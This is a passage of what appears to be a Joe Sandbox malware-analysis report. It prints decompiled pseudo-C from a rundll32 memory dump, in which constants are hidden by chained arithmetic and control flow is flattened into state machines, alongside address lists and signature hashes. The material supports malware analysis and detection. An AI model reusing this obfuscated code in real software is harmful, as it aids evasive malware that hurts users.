                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				void* __ecx;
                                                                                                                      				char _t245;
                                                                                                                      				void* _t263;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				void* _t280;
                                                                                                                      				void* _t306;
                                                                                                                      				intOrPtr _t307;
                                                                                                                      				char _t308;
                                                                                                                      				signed int* _t311;
                                                                                                                      
                                                                                                                      				_push(_a28);
                                                                                                                      				_t306 = __edx;
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_t245 = E006920B9(0);
                                                                                                                      				_v72 = _t245;
                                                                                                                      				_t311 =  &(( &_v168)[9]);
                                                                                                                      				_v84 = 0xd8cd3;
                                                                                                                      				_t307 = _t245;
                                                                                                                      				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                      				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                      				_t280 = 0xd3d1227;
                                                                                                                      				_v116 = 0xdf2f98;
                                                                                                                      				_v116 = _v116 >> 4;
                                                                                                                      				_v116 = _v116 | 0xd629951a;
                                                                                                                      				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                      				_v120 = 0x9d2532;
                                                                                                                      				_v120 = _v120 | 0x60368432;
                                                                                                                      				_v120 = _v120 << 1;
                                                                                                                      				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                      				_v104 = 0x3ed100;
                                                                                                                      				_v104 = _v104 >> 0xd;
                                                                                                                      				_v104 = _v104 << 0x10;
                                                                                                                      				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                      				_v132 = 0xac3ff1;
                                                                                                                      				_v132 = _v132 << 1;
                                                                                                                      				_v132 = _v132 ^ 0x8b709814;
                                                                                                                      				_v132 = _v132 + 0xffff5c55;
                                                                                                                      				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                      				_v164 = 0xc1955c;
                                                                                                                      				_v164 = _v164 + 0xe851;
                                                                                                                      				_v164 = _v164 >> 5;
                                                                                                                      				_t272 = 0x7c;
                                                                                                                      				_v164 = _v164 / _t272;
                                                                                                                      				_v164 = _v164 ^ 0x000d6983;
                                                                                                                      				_v76 = 0x371de3;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 ^ 0x00157680;
                                                                                                                      				_v156 = 0xc7985;
                                                                                                                      				_v156 = _v156 + 0xffff997a;
                                                                                                                      				_v156 = _v156 + 0x5493;
                                                                                                                      				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                      				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                      				_v92 = 0xd6ada;
                                                                                                                      				_v92 = _v92 + 0xf102;
                                                                                                                      				_v92 = _v92 ^ 0x00049005;
                                                                                                                      				_v152 = 0xbb1df2;
                                                                                                                      				_t273 = 0x71;
                                                                                                                      				_v152 = _v152 * 0x37;
                                                                                                                      				_v152 = _v152 << 2;
                                                                                                                      				_v152 = _v152 + 0x7572;
                                                                                                                      				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                      				_v108 = 0xfb68a6;
                                                                                                                      				_v108 = _v108 / _t273;
                                                                                                                      				_v108 = _v108 * 0x38;
                                                                                                                      				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                      				_v160 = 0x9cfb41;
                                                                                                                      				_v160 = _v160 >> 0xd;
                                                                                                                      				_v160 = _v160 + 0xffff2425;
                                                                                                                      				_v160 = _v160 | 0xc56bf860;
                                                                                                                      				_v160 = _v160 ^ 0xffffb927;
                                                                                                                      				_v100 = 0xcc3697;
                                                                                                                      				_v100 = _v100 << 9;
                                                                                                                      				_t274 = 0x3d;
                                                                                                                      				_v100 = _v100 / _t274;
                                                                                                                      				_v100 = _v100 ^ 0x027f162e;
                                                                                                                      				_v124 = 0x5e8102;
                                                                                                                      				_v124 = _v124 << 1;
                                                                                                                      				_v124 = _v124 >> 4;
                                                                                                                      				_v124 = _v124 ^ 0x000928e5;
                                                                                                                      				_v96 = 0x9a5083;
                                                                                                                      				_v96 = _v96 + 0xffff88fb;
                                                                                                                      				_v96 = _v96 | 0x7e2ee754;
                                                                                                                      				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                      				_v168 = 0x417f4c;
                                                                                                                      				_v168 = _v168 + 0x30ef;
                                                                                                                      				_v168 = _v168 + 0xffff0fcf;
                                                                                                                      				_v168 = _v168 | 0x766f950c;
                                                                                                                      				_v168 = _v168 ^ 0x7667a907;
                                                                                                                      				_v148 = 0xeb5ea2;
                                                                                                                      				_v148 = _v148 >> 1;
                                                                                                                      				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                      				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                      				_v88 = 0xc982d2;
                                                                                                                      				_v88 = _v88 | 0xbf502ba4;
                                                                                                                      				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                      				_v80 = 0x51a7e7;
                                                                                                                      				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                      				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                      				_v140 = 0x112038;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 ^ 0x000d6368;
                                                                                                                      				_v144 = 0x3c4be1;
                                                                                                                      				_v144 = _v144 << 1;
                                                                                                                      				_t275 = 0x51;
                                                                                                                      				_v144 = _v144 / _t275;
                                                                                                                      				_t276 = 0x44;
                                                                                                                      				_v144 = _v144 / _t276;
                                                                                                                      				_v144 = _v144 ^ 0x0006a926;
                                                                                                                      				_v112 = 0xebe610;
                                                                                                                      				_t277 = 6;
                                                                                                                      				_v112 = _v112 / _t277;
                                                                                                                      				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                      				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                      				_v128 = 0x507b99;
                                                                                                                      				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                      				_v128 = _v128 + 0xffff6e9b;
                                                                                                                      				_v128 = _v128 * 0x6f;
                                                                                                                      				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                      				_v136 = 0x1b49e9;
                                                                                                                      				_v136 = _v136 * 0x22;
                                                                                                                      				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                      				_v136 = _v136 ^ 0xda04c504;
                                                                                                                      				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                      				do {
                                                                                                                      					while(_t280 != 0x9b6c7ef) {
                                                                                                                      						if(_t280 == 0xd3d1227) {
                                                                                                                      							_t280 = 0x9b6c7ef;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t280 == 0xd8aa277) {
                                                                                                                      								E00699008(_v72, _v128, _v136);
                                                                                                                      							} else {
                                                                                                                      								_t317 = _t280 - 0xdb35d55;
                                                                                                                      								if(_t280 != 0xdb35d55) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_push(_v164);
                                                                                                                      									_push(_v132);
                                                                                                                      									_t308 = 0x44;
                                                                                                                      									E00684B61( &_v68, _t308);
                                                                                                                      									_push(_v92);
                                                                                                                      									_v68 = _t308;
                                                                                                                      									_push(_v156);
                                                                                                                      									_t284 = _v76;
                                                                                                                      									_v60 = E0069DCF7(_v76, 0x68173c, _t317);
                                                                                                                      									_t307 = E0069DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                      									E0068A8B0(_v144, _v60, _v112);
                                                                                                                      									_t311 =  &(_t311[0x19]);
                                                                                                                      									_t280 = 0xd8aa277;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t307;
                                                                                                                      					}
                                                                                                                      					_t263 = E00684241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                      					_t311 =  &(_t311[3]);
                                                                                                                      					__eflags = _t263;
                                                                                                                      					if(_t263 == 0) {
                                                                                                                      						_t280 = 0xcb447d9;
                                                                                                                      						goto L10;
                                                                                                                      					} else {
                                                                                                                      						_t280 = 0xdb35d55;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L13;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t280 - 0xcb447d9;
                                                                                                                      				} while (_t280 != 0xcb447d9);
                                                                                                                      				goto L13;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: T.~$hc$ru$($0$K<
                                                                                                                      • API String ID: 0-2343433060
                                                                                                                      • Opcode ID: bfe18d91f59b2b93a9d4a252447f8563bf78adfb0e9715053c9a2d16b8fc800f
                                                                                                                      • Instruction ID: 20c2567ac5247884e65b77bbadb16e81701728d254b1cf4f4e1640024416deb6
                                                                                                                      • Opcode Fuzzy Hash: bfe18d91f59b2b93a9d4a252447f8563bf78adfb0e9715053c9a2d16b8fc800f
                                                                                                                      • Instruction Fuzzy Hash: BCC133725083809FD768CF65C986A5BFBE2FBD5744F104A1DF29A96260C7B28909CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00683E3F() {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t213;
                                                                                                                      				signed int _t214;
                                                                                                                      				void* _t216;
                                                                                                                      				signed int _t222;
                                                                                                                      				intOrPtr _t223;
                                                                                                                      				signed int _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				void* _t230;
                                                                                                                      				void* _t236;
                                                                                                                      				void* _t257;
                                                                                                                      				signed int* _t261;
                                                                                                                      
                                                                                                                      				_t261 =  &_v100;
                                                                                                                      				_v8 = 0xc74bd8;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v72 = 0x3d4417;
                                                                                                                      				_v72 = _v72 << 8;
                                                                                                                      				_v72 = _v72 + 0xffff33fd;
                                                                                                                      				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                      				_v32 = 0xa9ac19;
                                                                                                                      				_v32 = _v32 + 0x4aca;
                                                                                                                      				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                      				_v40 = 0x1f6a8;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_v40 = _v40 * 0x6f;
                                                                                                                      				_t257 = 0xf52a3f4;
                                                                                                                      				_v40 = _v40 ^ 0x00d19880;
                                                                                                                      				_v44 = 0x168b17;
                                                                                                                      				_v44 = _v44 + 0x13a5;
                                                                                                                      				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                      				_v48 = 0xfac2ed;
                                                                                                                      				_v48 = _v48 + 0xffff2a35;
                                                                                                                      				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                      				_v92 = 0xc00c53;
                                                                                                                      				_v92 = _v92 + 0xffff1aa9;
                                                                                                                      				_v92 = _v92 + 0xf2d7;
                                                                                                                      				_t225 = 0x68;
                                                                                                                      				_v92 = _v92 / _t225;
                                                                                                                      				_v92 = _v92 ^ 0x0000565c;
                                                                                                                      				_v68 = 0xf2ac97;
                                                                                                                      				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                      				_v68 = _v68 >> 0xf;
                                                                                                                      				_v68 = _v68 ^ 0x000a8804;
                                                                                                                      				_v24 = 0xf89d13;
                                                                                                                      				_t226 = 0x49;
                                                                                                                      				_v24 = _v24 / _t226;
                                                                                                                      				_v24 = _v24 ^ 0x000ed122;
                                                                                                                      				_v96 = 0x9976f7;
                                                                                                                      				_v96 = _v96 >> 0xe;
                                                                                                                      				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                      				_v96 = _v96 ^ 0x684d855d;
                                                                                                                      				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                      				_v28 = 0x12a2d6;
                                                                                                                      				_t227 = 0xe;
                                                                                                                      				_v28 = _v28 * 0x29;
                                                                                                                      				_v28 = _v28 ^ 0x02ffade5;
                                                                                                                      				_v100 = 0x1d8880;
                                                                                                                      				_v100 = _v100 + 0x8a1e;
                                                                                                                      				_v100 = _v100 * 0x7c;
                                                                                                                      				_v100 = _v100 + 0xffff421a;
                                                                                                                      				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                      				_v36 = 0x784079;
                                                                                                                      				_v36 = _v36 / _t227;
                                                                                                                      				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                      				_v60 = 0xd037f8;
                                                                                                                      				_v60 = _v60 >> 0xf;
                                                                                                                      				_v60 = _v60 + 0xfffff3b4;
                                                                                                                      				_v60 = _v60 ^ 0xfff3df4e;
                                                                                                                      				_v64 = 0x95f516;
                                                                                                                      				_v64 = _v64 + 0xffffc55a;
                                                                                                                      				_v64 = _v64 | 0x523f0ae6;
                                                                                                                      				_v64 = _v64 ^ 0x52b19695;
                                                                                                                      				_v84 = 0x271827;
                                                                                                                      				_v84 = _v84 + 0xffff7017;
                                                                                                                      				_v84 = _v84 + 0x1e15;
                                                                                                                      				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                      				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                      				_v52 = 0x3d5883;
                                                                                                                      				_v52 = _v52 >> 5;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                      				_v56 = 0xd5acf2;
                                                                                                                      				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                      				_v56 = _v56 << 3;
                                                                                                                      				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                      				_v88 = 0xcc2476;
                                                                                                                      				_v88 = _v88 + 0x4ceb;
                                                                                                                      				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                      				_t228 = 0x4f;
                                                                                                                      				_v88 = _v88 / _t228;
                                                                                                                      				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                      				_v20 = 0x9b21e;
                                                                                                                      				_v20 = _v20 + 0x218b;
                                                                                                                      				_v20 = _v20 ^ 0x00037084;
                                                                                                                      				_v76 = 0xcba48;
                                                                                                                      				_t229 = 0x5a;
                                                                                                                      				_t222 = _v12;
                                                                                                                      				_v76 = _v76 * 0x7b;
                                                                                                                      				_v76 = _v76 + 0x3acc;
                                                                                                                      				_v76 = _v76 << 0x10;
                                                                                                                      				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                      				_v80 = 0x9c886e;
                                                                                                                      				_v80 = _v80 ^ 0x88757b42;
                                                                                                                      				_t230 = 0x5c;
                                                                                                                      				_v80 = _v80 / _t229;
                                                                                                                      				_v80 = _v80 << 0xe;
                                                                                                                      				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t213 = 0xa360d2e;
                                                                                                                      					do {
                                                                                                                      						while(_t257 != _t213) {
                                                                                                                      							if(_t257 == 0xb87cfc3) {
                                                                                                                      								_t223 =  *0x6a3e10; // 0x0
                                                                                                                      								_t224 = _t223 + 0x1c;
                                                                                                                      								while(1) {
                                                                                                                      									__eflags =  *_t224 - _t230;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									_t224 = _t224 + 2;
                                                                                                                      									__eflags = _t224;
                                                                                                                      								}
                                                                                                                      								_t222 = _t224 + 2;
                                                                                                                      								_t257 = 0xc7301de;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								if(_t257 == 0xc7301de) {
                                                                                                                      									_push(_v48);
                                                                                                                      									_push(_v44);
                                                                                                                      									_t216 = E0069DCF7(_v40, 0x681080, __eflags);
                                                                                                                      									_pop(_t236);
                                                                                                                      									__eflags = E0068AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                      									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                      									E0068A8B0(_v60, _t216, _v64);
                                                                                                                      									_t261 =  &(_t261[0xf]);
                                                                                                                      									L14:
                                                                                                                      									_t213 = 0xa360d2e;
                                                                                                                      									_t230 = 0x5c;
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									if(_t257 == 0xdd28c3f) {
                                                                                                                      										E00681FD1(_v20, _v76, _v80, _v16);
                                                                                                                      									} else {
                                                                                                                      										if(_t257 != 0xf52a3f4) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t257 = 0xb87cfc3;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _v12;
                                                                                                                      						}
                                                                                                                      						_t214 = E00681F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                      						_t261 =  &(_t261[4]);
                                                                                                                      						__eflags = _t214;
                                                                                                                      						_t257 = 0xdd28c3f;
                                                                                                                      						_t191 = _t214 == 0;
                                                                                                                      						__eflags = _t191;
                                                                                                                      						_v12 = 0 | _t191;
                                                                                                                      						goto L14;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t257 - 0x57f878b;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}











































                                                                                                                      0x00683f7d
                                                                                                                      0x00683f81
                                                                                                                      0x00683f89
                                                                                                                      0x00683f91
                                                                                                                      0x00683f9e
                                                                                                                      0x00683fa2
                                                                                                                      0x00683faa
                                                                                                                      0x00683fb2
                                                                                                                      0x00683fc0
                                                                                                                      0x00683fc4
                                                                                                                      0x00683fcc
                                                                                                                      0x00683fd4
                                                                                                                      0x00683fd9
                                                                                                                      0x00683fe1
                                                                                                                      0x00683fe9
                                                                                                                      0x00683ff1
                                                                                                                      0x00683ff9
                                                                                                                      0x00684001
                                                                                                                      0x00684009
                                                                                                                      0x00684011
                                                                                                                      0x00684019
                                                                                                                      0x00684023
                                                                                                                      0x00684030
                                                                                                                      0x00684038
                                                                                                                      0x00684040
                                                                                                                      0x00684045
                                                                                                                      0x0068404a
                                                                                                                      0x00684052
                                                                                                                      0x0068405a
                                                                                                                      0x00684062
                                                                                                                      0x00684067
                                                                                                                      0x0068406f
                                                                                                                      0x00684077
                                                                                                                      0x0068407f
                                                                                                                      0x0068408d
                                                                                                                      0x00684092
                                                                                                                      0x00684098
                                                                                                                      0x006840a0
                                                                                                                      0x006840a8
                                                                                                                      0x006840b0
                                                                                                                      0x006840b8
                                                                                                                      0x006840c5
                                                                                                                      0x006840c6
                                                                                                                      0x006840cc
                                                                                                                      0x006840d0
                                                                                                                      0x006840d8
                                                                                                                      0x006840dd
                                                                                                                      0x006840e5
                                                                                                                      0x006840ed
                                                                                                                      0x006840fb
                                                                                                                      0x006840fc
                                                                                                                      0x00684100
                                                                                                                      0x00684105
                                                                                                                      0x0068410d
                                                                                                                      0x0068410d
                                                                                                                      0x0068410d
                                                                                                                      0x00684112
                                                                                                                      0x00684112
                                                                                                                      0x0068411c
                                                                                                                      0x006841bb
                                                                                                                      0x006841c1
                                                                                                                      0x006841c9
                                                                                                                      0x006841c9
                                                                                                                      0x006841cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006841c6
                                                                                                                      0x006841c6
                                                                                                                      0x006841c6
                                                                                                                      0x006841ce
                                                                                                                      0x006841d1
                                                                                                                      0x00000000
                                                                                                                      0x00684122
                                                                                                                      0x00684128
                                                                                                                      0x00684146
                                                                                                                      0x0068414f
                                                                                                                      0x00684157
                                                                                                                      0x0068415d
                                                                                                                      0x006841a0
                                                                                                                      0x006841ae
                                                                                                                      0x006841b1
                                                                                                                      0x006841b6
                                                                                                                      0x00684208
                                                                                                                      0x0068420a
                                                                                                                      0x0068420f
                                                                                                                      0x00000000
                                                                                                                      0x0068412a
                                                                                                                      0x00684130
                                                                                                                      0x0068422e
                                                                                                                      0x00684136
                                                                                                                      0x0068413c
                                                                                                                      0x00000000
                                                                                                                      0x00684142
                                                                                                                      0x00684142
                                                                                                                      0x00000000
                                                                                                                      0x00684142
                                                                                                                      0x0068413c
                                                                                                                      0x00684130
                                                                                                                      0x00684128
                                                                                                                      0x00684235
                                                                                                                      0x00684240
                                                                                                                      0x00684240
                                                                                                                      0x006841f0
                                                                                                                      0x006841f7
                                                                                                                      0x006841fa
                                                                                                                      0x006841fc
                                                                                                                      0x00684201
                                                                                                                      0x00684201
                                                                                                                      0x00684204
                                                                                                                      0x00000000
                                                                                                                      0x00684210
                                                                                                                      0x00684210
                                                                                                                      0x00684210
                                                                                                                      0x00000000
                                                                                                                      0x0068421c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                      • API String ID: 0-3177096336
                                                                                                                      • Opcode ID: 351a353afe4de99b8e1213a95de4994611b884fa53a5755ef6f9e064a2070c2e
                                                                                                                      • Instruction ID: 6548d93ba7b4743e98455db3baa409fcdece0e467dadae9391db361caf532e39
                                                                                                                      • Opcode Fuzzy Hash: 351a353afe4de99b8e1213a95de4994611b884fa53a5755ef6f9e064a2070c2e
                                                                                                                      • Instruction Fuzzy Hash: A2A150B26083419FC398CF25C88A41BBBF2FBD4758F108A1DF1958A260D7B5894ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068B74D(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t231;
                                                                                                                      				intOrPtr _t232;
                                                                                                                      				intOrPtr _t233;
                                                                                                                      				void* _t237;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				void* _t266;
                                                                                                                      				void* _t267;
                                                                                                                      				signed int* _t270;
                                                                                                                      				signed int* _t271;
                                                                                                                      
                                                                                                                      				_t270 =  &_v104;
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0x6c2b32;
                                                                                                                      				_v8 = 0x58b11;
                                                                                                                      				_v64 = 0x37f8ee;
                                                                                                                      				_v64 = _v64 + 0xffff6702;
                                                                                                                      				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                      				_v64 = _v64 ^ 0xad79282c;
                                                                                                                      				_v100 = 0x6d524;
                                                                                                                      				_v100 = _v100 >> 0xf;
                                                                                                                      				_v100 = _v100 + 0x2921;
                                                                                                                      				_v100 = _v100 >> 6;
                                                                                                                      				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                      				_v28 = 0x9e9a;
                                                                                                                      				_t266 = __edx;
                                                                                                                      				_t237 = __ecx;
                                                                                                                      				_t267 = 0x52ffaa2;
                                                                                                                      				_t239 = 0xb;
                                                                                                                      				_v28 = _v28 / _t239;
                                                                                                                      				_v28 = _v28 ^ 0x00028e70;
                                                                                                                      				_v32 = 0x2476b5;
                                                                                                                      				_t240 = 0x6f;
                                                                                                                      				_v32 = _v32 / _t240;
                                                                                                                      				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                      				_v60 = 0x9e7d2d;
                                                                                                                      				_v60 = _v60 >> 0xc;
                                                                                                                      				_v60 = _v60 << 0xe;
                                                                                                                      				_v60 = _v60 ^ 0x02752993;
                                                                                                                      				_v24 = 0xe09194;
                                                                                                                      				_t241 = 0x44;
                                                                                                                      				_v24 = _v24 / _t241;
                                                                                                                      				_v24 = _v24 ^ 0x0009703f;
                                                                                                                      				_v96 = 0x854eb1;
                                                                                                                      				_v96 = _v96 + 0xc1c6;
                                                                                                                      				_v96 = _v96 * 0x1a;
                                                                                                                      				_v96 = _v96 | 0x594c04b7;
                                                                                                                      				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                      				_v20 = 0x86d30b;
                                                                                                                      				_v20 = _v20 | 0xe45dff90;
                                                                                                                      				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                      				_v92 = 0x8501b9;
                                                                                                                      				_v92 = _v92 >> 6;
                                                                                                                      				_v92 = _v92 * 0x2f;
                                                                                                                      				_v92 = _v92 + 0xe9ed;
                                                                                                                      				_v92 = _v92 ^ 0x0060653e;
                                                                                                                      				_v52 = 0xaa921f;
                                                                                                                      				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                      				_v52 = _v52 >> 1;
                                                                                                                      				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                      				_v56 = 0x2765e6;
                                                                                                                      				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                      				_v56 = _v56 | 0xccee86e2;
                                                                                                                      				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                      				_v88 = 0x89b797;
                                                                                                                      				_v88 = _v88 + 0x84ba;
                                                                                                                      				_v88 = _v88 + 0xc14;
                                                                                                                      				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                      				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                      				_v48 = 0x866a1d;
                                                                                                                      				_v48 = _v48 >> 9;
                                                                                                                      				_v48 = _v48 * 0x16;
                                                                                                                      				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                      				_v16 = 0x7d5d8a;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_v16 = _v16 ^ 0x000578c4;
                                                                                                                      				_v68 = 0x2c77b1;
                                                                                                                      				_v68 = _v68 | 0xad369f51;
                                                                                                                      				_v68 = _v68 << 0xd;
                                                                                                                      				_v68 = _v68 ^ 0xdff48475;
                                                                                                                      				_v72 = 0x3ef83;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 + 0xb46;
                                                                                                                      				_v72 = _v72 ^ 0x001ba742;
                                                                                                                      				_v76 = 0x4a0f2c;
                                                                                                                      				_t242 = 0x6a;
                                                                                                                      				_v76 = _v76 * 0x54;
                                                                                                                      				_v76 = _v76 << 0xa;
                                                                                                                      				_v76 = _v76 ^ 0x33e29f20;
